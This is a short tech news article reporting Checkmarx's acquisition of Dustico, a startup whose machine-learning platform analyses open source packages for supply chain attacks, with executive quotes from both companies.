Israeli cyber giant Checkmarx has acquired Israeli startup Dustico -- a SaaS platform that detects malicious attacks and backdoors in open source software supply chains. The sum of the deal has yet to be disclosed.

The startup helping Checkmarx up its security game

Dustico, a startup that has run bootstrap to date, has developed an open source platform designed for analyzing code packages using a machine learning algorithm (ML) to accurately detect supply chain attacks.

The young Israeli startup’s solution has found increased demand, as we witness a rise in supply chain attacks, some even garnering extensive media coverage due to their tremendous scope. One of those attacks, and stop me if you’ve heard about this one before, was the SolarWinds debacle, which released malicious code throughout different branches of the U.S. Federal Government.

The Israeli startup has developed a platform that operates in three stages to ensure that the code packages it checks are legitimate. First, it examines the "trust" - which focuses on the identity behind the code package, as well as anyone else who contributed to the open source code. It then tests the "health" of the code package, checking that its level of maintenance meets standards. And finally, the platform performs behavioral analysis of the package; while searching for malicious code that may have been implanted in it, through backdoors, ransomware, Trojans, or code that will allow for multi-stage attacks.

Checkmarx is expected to incorporate Dustico’s platform, including its supply chain behavioral analysis into its AST tool -- Designed for developers looking to perform security checks on their applications, which will now be able to expand not only to a specific application but to the entire supply chain.

“Today’s adversaries have zoned-in on software supply chains – many of which rely heavily on open source. As the threat of tampering in third-party packages increases, development teams must operate with the proactive assumption that all code may have been maliciously manipulated,” said Maty Siman, CTO, Checkmarx. “With Dustico, we’re building on our mission to secure open source by enabling customers to perform vulnerability, behavioral, and reputational analysis from a single solution. This will give developers and security leaders the insights and confidence needed to choose safer code packages, and in turn, build more secure applications at speed.”

“This is a very exciting time for Dustico and our community,” said Tzachi Zornstain, Co-Founder and CEO, Dustico. “We founded Dustico to help organizations cope with the explosion in supply chain and dependency attacks and fortify their trust in open source software, and we’re thrilled to join Checkmarx to further execute on this vision and bring our capabilities to a global set of customers.”